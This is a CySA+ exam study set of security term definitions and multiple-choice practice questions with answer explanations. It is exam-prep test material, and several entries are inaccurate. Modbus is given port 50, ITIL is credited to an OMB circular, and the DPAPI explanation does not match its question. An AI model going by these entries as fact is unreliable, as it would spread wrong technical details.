CySA+ CS0-002
An organization has a web server farm with an AV of $20,000. If the risk assessment has determined that a power failure is a threat agent for the web server farm and the EF for a power failure is 25%, the SLE for this event equals $_____________.
5000.00. The calculation for obtaining the SLE is as follows: SLE = AV × EF (20,000.00 × .25 = 5000.00)
Privileges Require (Pr)
A CVSS base metric that describes the authentication an attacker would need to get through to exploit the vulnerability
dd
A Linux command that is used to convert and copy files
Real User Monitoring (RUM)
A Monitoring Method that captures and analyzes every transaction of every application or website user
Define Arachni
A Ruby framework for assessing the security of a web application
Process Explorer
A Sysinternals tool that enables you to look at the graph that appears in Task Manager and identify what caused spikes in the past, which is not possible with Task Manager alone.
Sysinternals
A Windows command-line tool that contains more than 70 tools that can be used for both troubleshooting and security issues.
Define maintenance hook
A backdoor account created by programmers to give someone full permissions in a particular application or operating system
Peer-to-peer botnet
A botnet in which devices that can be reached externally are compromised and run server software that turns them into command and control servers for the devices that are recruited internally that cannot communicate with the command and control server operating externally.
Define Heap Overflow
A buffer overflow that occurs in the heap data area. Heap overflows are exploitable in a different manner to that of stack-based overflows.
EnCase Forensic
A case (incident) management tool that offers built-in templates for specific types of investigations
Remote Code Execution
A category of attack types distinguished by the ability of the hacker to get the local system (user system) to execute code that resides on another machine, which could be located anywhere in the world
Define next-generation firewall (NGFW)
A category of devices that attempt to address traffic inspection and application awareness shortcomings of a traditional stateful firewall, without hampering the performance
Representational State Transfer (REST)
A client/server model for interacting with content on remote systems, typically using HTTP
Private cloud
A cloud deployment model in which a private organization implements a cloud in its internal enterprise, and that cloud is used by the organization's employees and partners
Public Cloud
A cloud deployment model in which a service provider makes resources available to the public over the Internet
Define Hybrid Cloud
A cloud deployment model in which an organization provides and manages some resources and has others provided externally via a public cloud
Defined Community Cloud
A cloud deployment model in which the cloud infrastructure is shared among several organizations from a specific group with common computing needs.
virtual private cloud (VPC)
A cloud model in which a public cloud provider isolates a specific portion of its public cloud infrastructure to be provisioned for private use.
Software as a Service (SaaS)
A cloud service model in which the vendor provides the entire solution, including the operating system, the infrastructure software, and the application.
Qualys
A cloud-based vulnerability scanner
trusted execution
A collection of features that are used to verify the integrity of the system and implement security policies, which together can be used to enhance the trust level of the complete system.
Public Key Infrastructure (PKI)
A collection of systems, software, and communication protocols that distribute, manage, and control public key cryptography
Define forensic investigation suite
A collection of tools that are commonly used in digital forensic investigations
tcpdump
A command-line tool that can capture packets on Linux and Unix platforms.
Define Forensic Toolkit (FTK)
A commercial toolkit that can scan a hard drive for all sorts of information
Define Capability Maturity Model Integration (CMMI)
A comprehensive set of guidelines that address all phases of the software development life cycle (SDLC)
Secure Processing
A concept that uses a variety of technologies to prevent the processing of sensitive information or alternately to prevent any insecure actions on the part of the CPU or processor
threat model
A conceptual design that attempts to provide a framework on which to implement security efforts.
virtual private network (VPN)
A connection that allows external devices to access an internal network by creating an encrypted tunnel over the Internet.
threat feed
A constantly updating stream of indicators or artifacts derived from a source outside the organization.
ScoutSuite
A data collection tool that allows you to use what are called longitudinal survey panels to track and monitor the cloud environment
Purging
A data destruction technique that makes the data unreadable even with advanced forensic techniques
usermode debugger
A debugger that has access to only the usermode space of the operating system.
Define Kernel Debugger
A debugger that operates at ring o
Define timeliness
A description of how recent the data is
timeliness
A description of how recent the data is.
Relevancy
A description of the applicability of the data to a particular threat
Define Accuracy
A description of the correctness of the data
Define DevSecOps
A development concept that grew out of the DevOps approach to software development that emphasizes security in all phases
Define Air Gap
A device with no network connections and all access to the system must be done manually by adding and removing items with a flahs drive or other external device
service-level agreement (SLA)
A document that specifies a service to be provided by a party, the costs of the service, and the expectations of performance.
Define Incident Summary Report
A document that summarizes the incident
Proximity Reader
A door control that reads a proximity card from a short distance and is used to control access to a sensitive room
Define ISO/IEC 27000 series
A family of security program development standards providing guidance on how to develop and maintain an information security management system (ISMS)
Sticky MAC
A feature that allows a switch to learn the MAC addresses of the devices currently connected to the port and convert them to secure MAC addresses (the only MAC addresses allowed to send on the port).
web application firewall (WAF)
A firewall that applies rule sets to an HTTP conversation. These rule sets cover common attack types to which these session types are susceptible. Among the common attacks they address are cross-site scripting and SQL injections.
Screened Host Firewall
A firewall that is between the final router and the internal network
Define configuration baseline
A floor or minimum standard that is required
Define Cellebrite
A forensic tool that focuses on collecting evidence from smartphones
tokenization
A form of data hiding or masking in that it replaces a value with a token that is used instead of the actual value.
Define Incident Form
A form that is used to describe the incident in detail
Define incident response
A formal process or set of procedures for responding to cyber security incidents
threat modeling methodology
A formal process that enables organizations to identify threats and potential attacks and implement the appropriate mitigations against these threats and attacks.
Risk Management
A formal process that rate identified vulnerabilities by the likelihood of their compromise and the impact of said compromise
Define NIST Cybersecurity Framework Version 1.1
A framework that focuses exclusively on IT security
Define Memdump
A free tool that runs on Windows, Linux, and Solaris that simply creates a bit-by-bit copy of the volatile memory on a system
strcpy
A function in C++ that copies the C string pointed to by the source into the array pointed to by the destination, including the terminating null character (and stopping at that point). A function that has a reputation for issues. The issue is that if the destination is not long enough to contain the string, an overrun occurs.
Define oclHashcat
A general-purpose computing on graphics processing units (GPGPU)-based multi-hash cracker using a brute-force attack
white team
A group of technicians that referees the encounter between the red team and the blue team during testing.
Red Team
A group of technicians who acts as the attacking force during testing
Define Blue Team
A group of technicians who acts as the network defense team during testing
Define MicroSD HSM
A hardware security module that connects to the microSD port
Define Digital Signature
A hash value encrypted with the sender's private key
Type 2 hypervisor
A hypervisor installed over an existing operating system. Examples include VMware Workstation and Oracle VM VirtualBox.
Define Legal Hold
A legal requirement placed on an organization to maintain archived data for longer periods for legal proceedings
Define embedded link
A link embedded in one website that leads to another site
Define Call List / Escalation List
A list of contact information for all individuals, such as first responders, who might need to be alerted during the investigation of an incident
Define Certificate Revocation List (CRL)
A list of expired and revoked certificates
Define Helix
A live CD with which you can acquire evidence and make drive images without affecting the data on the host
virtual local-area network (VLAN)
A logical subdivision of a switch that segregates ports from one another as if they were in different LANs.
What is the single biggest threat to mobile devices
A lost or stolen device containing irreplaceable or sensitive data. Organizations should ensure that they can remotely wipe the device when this occurs.
Define DNP3
A master/slave protocol used in building automation that uses port 19999 when using Transport Layer Security (TLS) and port 20000 when not using TLS
Define Modbus
A master/slave protocol used in building automation that uses port 50
Define Asset Criticality
A measure of how essential an asset is to the organization's business
sensitivity
A measure of how freely data can be handled.
define criticality
A measure of importance of the data
Define Backdoor/Trapdoor
A mechanism implemented in many devices or applications that gives the user who uses the backdoor unlimited access to the device or application
Define KnTTools
A memory acquisition and analysis tool used with Windows systems
Define FATKit
A memory forensics tool that automates the process of extracting interesting data from volatile memory
Define Automated Malware Signature Creation
A method of identifying malware in which the AV software monitors incoming unknown files for the presence of malware and analyzed the file based on both classifiers of file behavior and classifiers of file content.
Define Framework
A methodology designed to help guide security professionals
Define Kill Chain
A model that describes the stages of an intrusion
Define extranet
A network logically separate from the intranet where resources that will be accessed from the outside world are made available to authenticated users.
Define Demilitarized Zone (DMZ)
A network logically separate from the intranet where resources that will be accessed from the outside world are made available to unauthenticated users
Secure Enclave
A part of an operating system that cannot be compromised even when the operating system kernel is compromised, because the enclave has its own CPI and is separated from the rest of the system.
Define mantrap
A physical access control system that consists of a series of two doors with a small room between them. The user is authenticated at the first door and then allowed into the room. At that point additional verification occurs
Define embedded system
A piece of software built into a larger piece of software that is in charge of performing some specific function on behalf of the larger system
Define acceptable use policy (AUP)
A policy that is used to inform users of the actions that are allowed and those that are not allowed.
Define endpoint detection and response (EDR)
A proactive endpoint security approach designed to supplement existing defenses
Define hunt teaming
A proactive threat hunting tactic in which a team works together to detect, identify, and understand advanced and determined threat actors. It is a new proactive approach to security that is offensive in nature rather than defensive, which has been common for security teams in the past.
Define ITIL
A process management development standard developed by the Office of Management and Budget in OMB Circular A-130
Define Decompiling
A process that attempts to reconstruct high-level language source code
system hardening
A process that ensures that all systems have been hardened to the extent that is possible and still provide functionality.
Define host scanning
A process that involves identifying the live hosts on a network or in a domain namespace
Define Insecure Object Reference
A process that occurs when a user has permission to use an application but is accessing information to which she should not have access
Define Debugging
A process that steps through the code interactively
system assessment
A process whereby systems are fully vetted for potential issues from both a functionality and security standpoint.
Trojan horse
A program or rogue application that appears to or is purported to do one thing but actually does another when executed.
Trusted Foundry program
A program that can help you exercise care in ensuring the authenticity and integrity of the components of hardware purchased from a vendor.
Secure European System for Applications in a Multi-vendor Environment (SEASME)
A project that extended Kerberos's functionality to fix Kerberos's weaknesses. Uses both symmetric and asymmetric cryptography to protect interchanged data and uses a trusted authentication server at each host.
Define Nessus Professional
A proprietary network scanner developed by Tenable Network Security
Syslog
A protocol that can be used to collect logs from devices and store them in a central location called a Syslog server.
Define Internet Protocol Security (IPsec)
A protocol that provides encryption, data integrity, and system-based authentication
Patent
A right granted to an individual or company to protect the rights to an invention
sinkhole
A router designed to accept and analyze attack traffic that can be used to draw traffic away from a target, to monitor worm traffic, or to monitor other malicious traffic.
uncredentialed scan
A scan in which the scanner lacks administrative privileges on the device it is scanning.
Define credentialed scan
A scan performed with administrator access
Define non-credentialed scan
A scan performed without administrator access
Port Scan
A scan that attempts to connect to every port on each device and report which ports are open, or "listening"
Define null scan
A scan that is a series of TCP packets that contain a sequence number of 0 and no set flags
Ping sweep
A scan that uses ICMP to identify all live hosts by pinging all IP addresses in the known network
Perl
A scripting language found on all Linux servers. It helps in text manipulation tasks
Define Node.js
A scripting language framework to write network applications using JavaScript
Ruby
A scripting language that is great for web development
Define Bash
A scripting language that is used to work in the Linux interface
Python
A scripting language that supports procedure-oriented programming and object-oriented programming
string search
A search technique that is used to look within a log file or data stream and locate any instances of that string.
Security Assertions Markup Language (SAML)
A security attestation model build on XML and SOAP-based services that allows for the exchange of authentication and authorization data between systems and supports federated identity management
Trusted Platform Module (TPM)
A security chip installed on a computer's motherboard that is responsible for protecting symmetric and asymmetric keys, hashes, and digital certificates.
Define NIST SP 800-53 rev. 4
A security controls development framework that divides the controls into three classes: technical, operational, and management
Define Dynamic ARP Inspection (DAI)
A security feature that intercepts all ARP requests and responses and compares each response's MAC address and IP address information against the MAC-IP bindings contained in a trusted binding table
virus
A self-replicating program that infects software.
Define Jumpbox
A server that is used to access devices that have been placed in a security network zone such as a DMZ
Define Network Access Control (NAC)
A service that goes beyond authentication of the user and includes examination of the state of the computer the user is introducing to the network when making a remote-access or VPN connection to the network
Define Aircrack-ng
A set of command line tools for sniffing and attacking wireless networks
Define E-mail signature block
A set of information such as name, e-mail address, company title, and credentials that usually appears at the end of an e-mail
Define Atomic Execution
A set of instructions either execute in order and in entirety or the changes they make are rolled back or prevented Atomic operation in concurrent programming are program operations that run independently of any other processes (threads). Making the operation atomic consists of using synchronization mechanisms in order to make sure that the operation is seen, from any other thread, as a single atomic operation. This increases security by preventing one thread from viewing the state of the data when the first thread is still in the middle of the operation. (dafaq?)
Processor Security Extensions
A set of security related instruction cods that are built into some modern central processing units (CPUs)
Rootkit
A set of tools that a hacker can use on a computer after she has managed to gain access and elevate her privileges to administrator
Define Near Field Communication (NFC)
A short-range type of wireless transmission that is used in payment cards such as Apple Pay and Google Pay
Phishing
A social engineering attack in which attackers try to learn personal information, including credit card information and financial data.
Define Cloud Access Security Broker (CASB)
A software layer that operates as a gatekeeper between an organization's on-premises network and the provider's cloud envinoment
virtual TPM (vTPM)
A software object that performs the functions of a TPM chip.
virtual SAN
A software-defined networking storage method that allows pooling of storage capabilities and instant and automatic provisioning of virtual machine storage.
USB on the GO (USB OTG)
A specification first used in late 2001 that allows USB devices, such as tablets or smartphones, to act as either a USB host or a USB device.
Define Extensible Access Control Markup Language (XACML)
A standard for an access control policy language using XML
Define National Information Assurance Certification and Accreditation Process (NIACAP)
A standard set of activities and general tasks, along with a management structure, to certify and accredit systems that maintain the information assurance and security posture of a system or site.
802.1X
A standard that defines a framework for centralized port based authentication
Security Content Automation Protocol (SCAP)
A standard that the security automation community uses to enumerate software flaws and configuration issues
Define corporate-owned, personally enabled (COPE)
A strategy in which an organization purchases mobile devices and users manage those devices
security regression testing
A subset of regression testing that validates that changes have not reduced the security of the application or opened new weaknesses.
Define Burp Suite
A suite of tools used for testing web applications
Real-time operating system (RTOS)
A system designed to process data as it comes in, typically without buffer delays
Define Common Vulnerabilities Scoring System (CVSS)
A system of ranking vulnerabilities that are discovered based on pre-defined metrics
supervisory control and data acquisition (SCADA)
A system operating with coded signals over communication channels so as to provide control of remote equipment.
Define Intrusion Detection System (IDS)
A system that creates a log of every security event that occurs
Define Honeypot
A system that is configured to be attractive to hackers and to lure them into spending time attacking it while information is gathered about the attack
Define Mobile Device Management (MDM)
A system that is used to control mobile device settings, applications, and other parameters when those devices are attached to the enterprise.
wireless intrusion prevention system (WIPS)
A system that not only can alert you when any unknown device is in the area (APs and stations) but can take a number of actions.
Define Intrusion Prevention System (IPS)
A system that takes action when a security event occurs
Risk Assessment Matrix
A table used to assess risks qualitatively
Define intellectual property
A tangible or intangible asset to which the owner has exclusive rights
Define data enrichment
A technique that allows one process to gather information from another process or source and then customize a response using the data from the second process or source.
Password Spraying
A technique used to identify the passwords of domain users. Rather than targeting a single account as in a brute-force attack, it targets or "sprays" multiple accounts with the same password attempt.
Define NetFlow
A technology developed by Cisco that is supported by all major vendors and can be used to collect and subsequently export IP traffic account information
Define measured boot
A term that applies to several technologies that follow the Secure Boot standard
zero-day threat
A threat that has no known solution yet.
Responder
A tool that can be used for answering NBT and LLMNR name requests
Define Nmap
A tool that can be used to scan for open ports and perform many other operations, including performing certain attacks
Prowler
A tool that creates reports that list gaps found between the best practices of AWS as stated in CIS Amazon Web Services Foundation Benchmark 1.1
Risk Assessment
A tool used in risk management to identity vulnerabilities and threats, assess the impact of those vulnerabilities and threats, and determine which controls to implement
Secure Sockets Layer/Transport Layer Security (SSL/TLS)
A transport layer protocol that provides encryption, server and client authentication, and message integrity
symmetric algorithm
A type of algorithm that uses a private or secret key that must remain secret between the two parties. Each party requires a separate private key.
traditional botnet
A type of botnet in which all the zombies communicate directly with the command and control server, which is located outside the network.
stream-based cipher
A type of cipher that performs encryption on a bit-by-bit basis and uses keystream generators.
Define corrective control
A type of control put into place to reduce the effect of an attack or other undesirable event
Define Deterrent Control
A type of control that deters or discourages an attacker
Define compensating control
A type of control that is applied to mitigate the impact or likelihood of an attack; also called a countermeasure
Responsive Control
A type of control that is implemented after an event; also called a recovery control
Define Managerial (Administrative Type) Controls
A type of control that is implemented to administer the organization's assets and personnel and include security policies, procedures, standards, baselines, and guidelines that are established by management.
Physical Control
A type of control that is implemented to protect an organization's facilities and personnel
Define Detective Control
A type of control that is in place to detect an attack while it is occurring
Define Operational Control
A type of control that is part of the organizational security stance day-to-day
Preventative Control
A type of control that prevents an attack from occurring
Define directive control
A type of control that specifies acceptable practice within an organization
technical control
A type of control, usually a software or hardware component, that is used to restrict access.
user and entity behavior analytics (UEBA)
A type of cybersecurity analysis that focuses on normal user activities and detects anomalous behavior when there are deviations from the norm.
Define host-based firewall
A type of firewall that resides on a single host and is designed to protect that host only
Define Multihomed firewall
A type of firewall with three interfaces: one connected to the untrusted network, one connected to the internal network, and one connected to the DMZ
Define Dual-Homed Firewall
A type of firewall with two interfaces, one pointing to the internal network and another connected to the untrusted network
worm
A type of malware that can spread without the assistance of the user.
Define Botnet
A type of malware that installs a bot with the ability to connect back to the hacker's computer. After that, his server controls all the bots located on these machines
Ransomware
A type of malware that prevents or limits users from accessing their systems. It is called ransomware because it forces its victims to pay a ransom through certain online payment methods
standard word password
A type of password that consists of single words that often include a mixture of upper- and lowercase letters.
Define Numeric Password
A type of password that includes only numbers
Define Cognitive Password
A type of password that is a piece of information that can be used to verify an individual's identity
Define One-time password (OTP)
A type of password that is used only once to log in to the access control system
static password
A type of password that provides a minimum level of security because the password never changes.
Define passphrase password
A type of password that uses a long phrase. Because of the password's length, it is easier to remember but much harder to attack
Define Combination Password
A type of password that uses a mix of dictionary words, usually two that are unrelated
Define graphical password
A type of password that uses graphics as part of the authentication mechanism; also called CAPTCHA password
synthetic transaction monitoring
A type of proactive monitoring that uses external agents to run scripted transactions against an application.
Define Field Programmable Gate Array (FPGA)
A type of programmable logic device (PLD) that is programmed by blowing fuse connection on the chip or using an antifuse that makes a connection when a high voltage is applied to the junction. A PLD is an integrated circuit with connections or internal logic gates that can be changed through a programming process.
vulnerability scan
A type of scan that locates vulnerabilities in systems.
XMAS scan
A type of scan that sets the FIN, PSH, and URG flags.
Define Active Vulnerability Scanner
A type of scanner that can take action to block an attack , such as block a dangerous IP address
Define passive vulnerability scanner
A type of scanner that cannot take action to block an attack, such as block a dangerous IP address
web vulnerability scanner
A type of scanner used to assess the security of web applications.
Security Information and Event Management (SIEM)
A type of system that provides an automated solution for analyzing security events and data and deciding where the attention needs to be given.
stress testing
A type of testing that determines the workload that an application can withstand.
Define Microservices
A variant of the service-oriented architecture (SOA) structural style that arranges an application as a collection of three loosely coupled services. The focus is on building single-function modules with well-defined interfaces and operations.
Define internal scan
A vulnerability scan performed from inside the organization's network to assess the likelihood of an insider attack.
Define External Scan
A vulnerability scan performed from outside the organization's network to assess the likelihood of an external attack
Define Nikto
A vulnerability scanner that is dedicated to web servers
Define Cain and Abel
A well-known password cracking program
Which of the following attacks can result in reading sensitive data from the database, modifying database data, and executing administrative operations on the database? 1. SQL Injection 2. STUXNET 3. Integer Overflow 4. TAXII
A. A SQL injection attack inserts, or "injects," a SQL query as the input data from the client to the application. This type of attack can result in reading sensitive data from the database, modifying database data, executing administrative operations on the database, recovering the content of a given file, and even issuing commands to the operating system.
Which of the following is installed on hardware and is considered as "bare metal"? 1. Type 1 Hypervisor 2. VMware Workstation 3. Type 2 Hypervisor 4. Oracle VirtualBox
A. A Type 1 hypervisor is virtualization software that is installed on hardware directly, which is why it is commonly called a bare metal hypervisor. A guest operating system runs on another level above the hypervisor. Examples of Type 1 hypervisors are Citrix XenServer, Microsoft Hyper-V, and VMware vSphere.
Which of the following is a technique in which the kernel allows for multiple isolated user space instances? 1. Containerization 2. Segmentation 3. Affinity 4. Secure Boot
A. A newer approach to virtualization is referred to as container-based virtualization, also called operating system virtualization. Containerization is a technique in which the kernel allows for multiple isolated user space instances. The instances are known as containers, virtual private servers, or virtual environments.
Which of the following is a type of race condition? 1. Time-of-check/Time-of-use 2. NOP Sled 3. Dereferencing 4. Overflow
A. A race condition is an attack in which the hacker inserts himself between instructions, introduces changes, and alters the order of execution of the instructions, thereby altering the outcome. A type of race condition is time-of-check/time-of-use. In this attack, a system is changed between a condition check and the display of the check's results.
Which of the following is a type of IPS and is an expert system that uses a knowledge base, an inference engine, and programming? 1. Rule-based 2. Signature-based 3. Heuristics-based 4. Error-based
A. A rule-based IPS is an expert system that uses a knowledge base, an inference engine, and rule-based programming. The knowledge is configured as rules.
Which of the following is a part of an operating system that cannot be compromised even when the operating system kernel is compromised? 1. Secure enclave 2. Processor security extensions 3. Atomic execution 4. XN bit
A. A secure enclave is a part of an operating system that cannot be compromised even when the operating system kernel is compromised, because the enclave has its own CPU and is separated from the rest of the system.
Which of the following can be used to prevent a compromised host from communicating back to the attacker? 1. Sinkholing 2. DNSSec 3. NASC 4. Port security
A. A sinkhole is a router designed to accept and analyze attack traffic. Sinkholes can be used to do the following: Draw traffic away from a target Monitor worm traffic Monitor other malicious traffic
Which of the following occurs when the scanner correctly identifies a vulnerability? 1. True positive 2. False positive 3. False negative 4. True negative
A. A true positive occurs when the scanner correctly identifies a vulnerability. True means the scanner is correct and positive means it identified a vulnerability.
Which of the following is used to locate live devices? 1. Ping sweep 2. Port scan 3. Pen test 4. Vulnerability test
A. Also known as ICMP sweeps, ping sweeps use ICMP to identify all live hosts by pinging all IP addresses in the known network. All devices that answer are up and running.
Threat feeds inform the recipient about all but which of the following? 1. Presence of malware on the recipient 2. Suspicious domains 3. Lists of known malware hashes 4. IP addresses associated with malicious activity
A. Although threat feeds can tell you about malware out in the wild, it can't tell you whether you are currently infected.
Which of the following standards verifies the controls and processes and requires a written assertion regarding the design and operating effectiveness of the controls being reviewed? 1. SSAE 16 2. HIPAA 3. GLBA 4. CFAA
A. An SSAE 16 verifies the controls and processes and requires a written assertion regarding the design and operating effectiveness of the controls being reviewed.
Which of the following reports focuses on internal controls over financial reporting? 1. SOC 1 2. SOC 2 3. SOC 3 4. SOC 4
A. An SSAE 18 audit results in a Service Organization Control (SOC) 1 report, which focuses on internal controls over financial reporting.
Third-party personnel should be familiarized with organizational policies related to data privacy and should sign which of the following? 1. NDA 2. MOU 3. ICA 4. SLA
A. As part of prevention of privacy policy violations, any contracted third parties that have access to PII should be assessed to ensure that the appropriate controls are in place. In addition, third-party personnel should be familiarized with organizational policies and should sign non-disclosure agreements (NDAs).
Which of the following consists of single words that often include a mixture of upper- and lowercase letters? 1. Standard word passwords 2. Complex passwords 3. Passphrase passwords 4. Cognitive passwords
A. As the name implies, these passwords consist of single words that often include a mixture of upper- and lowercase letters. The advantage of this password type is that it is easy to remember. A disadvantage of this password type is that it is easy for attackers to crack or break, resulting in compromised accounts.
Which of the following allows you to run a possibly malicious program in a safe environment so that it doesn't infect the local system? 1. Sandbox 2. Secure memory 3. Secure enclave 4. Container
A. By using sandboxing tools, you can execute malware executable files without allowing the files to interact with the local system.
Which of the following are in place to substitute for a primary access control and mainly act to mitigate risks? 1. Compensating controls 2. Secondary controls 3. Accommodating controls 4. Directive controls
A. Compensative controls are put in place to substitute for a primary access control and mainly act to mitigate risks. By using compensative controls, you can reduce risk to a more manageable level.
Which of the following is designed to allow vehicle microcontrollers and devices to communicate with each other's applications without a host computer? 1. CAN bus 2. ZigBee 3. Modbus 4. BAP
A. Controller Area Network (CAN bus) is designed to allow vehicle microcontrollers and devices to communicate with each other's applications without a host computer.
Which of the following enables you to verify the source of an e-mail by providing a method for validating a domain name identity that is associated with a message through cryptographic authentication? 1. DKIM 2. DNSSec 3. IPsec 4. AES
A. DomainKeys Identified Mail (DKIM) enables you to verify the source of an e-mail. DKIM provides a method for validating a domain name identity that is associated with a message through cryptographic authentication.
Which control provides data confidentiality? 1. Encryption 2. Hashing 3. Redundancy 4. Digital signatures
A. Encryption and cryptography are technologies that comprise a technical control that can be used to provide the confidentiality objective of the CIA triad.
Within which of the following tools is the Application log found? 1. Event Viewer 2. Performance 3. System Information 4. App Locker
A. Event Viewer displays the Application log, an event log dedicated to errors and issues related to applications.
Which of the following is an extension of the PaaS model 1. FaaS 2. IaC 3. SaaS 4. IaaS
A. Function as a Service (FaaS) is an extension of Platform as a Service (PaaS) that goes further and completely abstracts the virtual server from the developers.
Which of the following is an application, network, and media access control (MAC) layer communications service used in HVAC systems: 1. BACnet 2. Modbus 3. CAN bus 4. BAP
A. HVAC systems usually use a protocol called Building Automation and Control Networks (BACnet), which is an application, network, and media access control (MAC) layer communications service. It can operate over a number of Layer 2 protocols, including Ethernet.
Which of the following determines the susceptibility of a system to a particular threat or risk using decision rules or weighing methods? 1. Heuristics 2. Trend analysis 3. SPF 4. Regression analysis
A. Heuristics is often utilized by antivirus software to identify threats that signature analysis can't discover because the threats either are too new to have been analyzed (called zero-day threats) or are multipronged attacks that are constructed in such a way that existing signatures do not identify them.
Which of the following is a new approach to security that is offensive in nature rather than defensive? 1. Hunt teaming 2. White teaming 3. Blue teaming 4. APT
A. Hunt teams work together to detect, identify, and understand advanced and determined threat actors. A hunt team is a costly investment on the part of an organization.
Which of the following manages and provisions computer data centers through machine-readable definition files: 1. IaC 2. PaaS 3. SaaS 4. IaaS
A. In another reordering of the way data centers are handled, Infrastructure as Code (IaC) manages and provisions computer data centers through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools.
Which of the following information sharing and analysis communities is driven by the requirements of HIPAA. 1. H-ISAC 2. Financial Services Information Sharing and Analysis Center 3. Aviation Government Coordinating Council 4. ENISA
A. In the healthcare community, where protection of patient data is legally required by HIPAA, an example of a sharing platform is H-ISAC (Health Information Sharing and Analysis Center). It is a global operation focused on sharing timely, actionable, and relevant information among its members, including intelligence on threats, incidents, and vulnerabilities.
Which of the following HIPAA rules requires covered entities and their business associates to provide notification following a breach of unsecured PHI? 1. Breach Notification Rule 2. Privacy Rule 3. Security Rule 4. Enforcement Rule
A. In the healthcare field, the HIPAA Breach Notification Rule, 45 CFR §§ 164.400-414, requires HIPAA covered entities and their business associates to provide notification following a breach of unsecured protected health information (PHI).
Which of the following can enhance security of APIs: 1. DPAPI 2. SGX 3. SOAP 4. REST
A. In-memory processing is an approach in which all data in a set is processed from memory rather than from the hard drive. It assumes that all the data will be available in memory rather than just the most recently used data, as is usually done using RAM or cache memory. This results in faster reporting and decision making in business. Securing this requires encrypting the data in RAM. The Data Protection API (DPAPI) lets you encrypt data using the user's login credentials.
Which of the following refers to behaviors and activities that precede or accompany a security incident? 1. IoCs 2. NOCs 3. IONs 4. SOCs
A. Indicators of compromise (IoCs) are behaviors and activities that precede or accompany a security incident.
When you implement a new password policy what category of control have you implemented? 1. Managerial 2. Operational 3. Technical 4. Preventative
A. Management or administrative controls are implemented to administer the organization's assets and personnel and include security policies, procedures, standards, baselines, and guidelines that are established by management.
Which of the following controls are implemented to administer the organization's assets and personnel and include security policies, procedures, standards, baselines, and guidelines that are established by management? 1. Managerial 2. Physical 3. Technical 4. Logical
A. Managerial controls are implemented to administer the organization's assets and personnel and include security policies, procedures, standards, baselines, and guidelines that are established by management. These controls are commonly referred to as soft controls. Specific examples are personnel controls, data classification, data labeling, security awareness training, and supervision.
Which of the following is a draft publication that gives guidelines on hardware-rooted security in mobile devices? 1. NIST SP 800-164 2. IEEE 802.11ac 3. FIPS 120 4. IEC/IOC 270017
A. NIST SP 800-164 is a draft Special Publication that gives guidelines on hardware-rooted security in mobile devices. It defines three required security components for mobile devices: Roots of Trust (RoTs), an application programming interface (API) to expose the RoTs to the platform, and a Policy Enforcement Engine (PEnE).
Which of the following contains recommendations for key management: 1. NIST SP 800-57 REV 5 2. PCI-DSS 3. OWASP 4. FIPS
A. NIST SP 800-57 REV. 5 contains recommendations for key management in three parts: Part 1: This publication covers general recommendations for key management. Part 2: This publication covers the best practices for a key management organization. Part 3: This publication covers the application-specific key management guidance.
Which of the following is the key to trusted firmware updates? 1. Obtain firmware updates only from the vendor directly 2. Use a third-party facilitator to obtain updates 3. Disable Secure Boot 4. Follow the specific directions with the update
A. Obtain firmware updates only from the vendor directly. Never use a third-party facilitator for this. Also make sure you verify the hash value that comes along with the update to ensure that it has not been altered since its creation.
Which of the following is a packet analyzer? 1. Wireshark 2. FTK 3. Helix 4. Cain and Abel
A. One of the most widely used packet analyzers is Wireshark. It captures raw packets off the interface on which it is configured and allows you to examine each packet. If the data is unencrypted, you can read the data.
Which of the following items in a digital forensic investigation suite is used to make copies of a hard drive? 1. Imaging utilities 2. Analysis utilities 3. Hashing utilities 4. Password crackers
A. One of the tasks you will be performing as a security professional is making copies of storage devices. For this you need a disk imaging tool.
Which of the following processes involves terminating the activity that causes a risk or choosing an alternative that is not as risky? 1. Risk avoidance 2. Risk transfer 3. Risk mitigation 4. Risk acceptance
A. Risk avoidance consists of terminating the activity that causes a risk or choosing an alternative that is not as risky.
Which of the following is used to provide transparent encryption on self-encrypting drives? 1. DEK 2. TPM 3. UEFI 4. ENISA
A. Self-encrypting drives do exactly as the name implies: they encrypt themselves without any user intervention. It is so transparent to the user that the user may not even be aware the encryption is occurring. It uses a unique and random data encryption key (DEK).
Which of the following is a measure of how freely data can be handled? 1. Sensitivity 2. Privacy 3. Secrecy 4. Criticality
A. Sensitivity is a measure of how freely data can be handled. Some data requires special care and handling, especially when inappropriate handling could result in penalties, identity theft, financial loss, invasion of privacy, or unauthorized access by an individual or many individuals.
Which of the following threat intelligence data types is generated from past activities: 1. Reputational 2. Behavioral 3. Heuristics 4. Anticipatory
A. Some threat intelligence data is generated from past activities. Reputational scores may be generated for traffic sourced from certain IP address ranges, domain names, and URLs.
Which of the following is a protocol that can be used to collect logs from devices and store them in a central location? 1. Syslog 2. DNSSec 3. URLQuery 4. SMTP
A. Syslog provides a simple framework for log entry generation, storage, and transfer that any OS, security software, or application could use if designed to do so.
The U.S. Federal Bureau of Investigation (FBI) has identified all but which of the following categories of threat actors? 1. Hacktivists 2. Organized crime 3. State sponsors 4. Terrorist groups
A. The FBI has not singled out hacktivists as a major group and would probably include them in the category of terrorists since they seek to damage or deface in the name of a cause.
Which of the following provides guidance for how to organize to respond to an incident (system description) and processes to manage the response through its successive stages (concept of operations): 1. ICS 2. DMVPN 3. IEE 4. IoT
A. The Incident Command System (ICS) is designed to provide a way to enable effective and efficient domestic incident management by integrating a combination of facilities, equipment, personnel, procedures, and communications operating within a common organizational structure.
Which of the following allows you prevent any changes to the device configuration, even by users who formerly had the right to configure the device? 1. Configuration lockdown 2. System hardening 3. NAC 4. DNSSec
A. The configuration lockdown setting helps support change control.
Which of the following is not one of the five categories of IoT deployments: 1. LAN base 2. Smart home 3. Wearables 4. Connected cars
A. The five groups of IoT deployments are as follows: Smart home: Includes products that are used in the home. They range from personal assistance devices, such as Amazon Alexa, to HVAC components, such as Nest thermostats. These devices are designed for home management and automation. Wearables: Includes products that are worn by users. They range from watches, such as the Apple Watch, to personal fitness devices, such as the Fitbit. Smart cities: Includes devices that help resolve traffic congestion issues and reduce noise, crime, and pollution. They include smart energy, smart transportation, smart data, smart infrastructure, and smart mobility devices. Connected cars: Includes vehicles that include Internet access and data sharing capabilities. Technologies include GPS devices, OnStar, and AT&T connected cars. Business automation: Includes devices that automate HVAC, lighting, access control, and fire detection for organizations.
Which of the following is a service that goes beyond authentication of the user and includes examination of the state of the computer the user is introducing to the network when making a remote-access or VPN connection to the network? 1. NAC 2. DAC 3. EDR 4. DLP
A. The goal of network access control is to examine all devices requesting network access for malware, missing security updates, and any other security issues the devices could potentially introduce to the network.
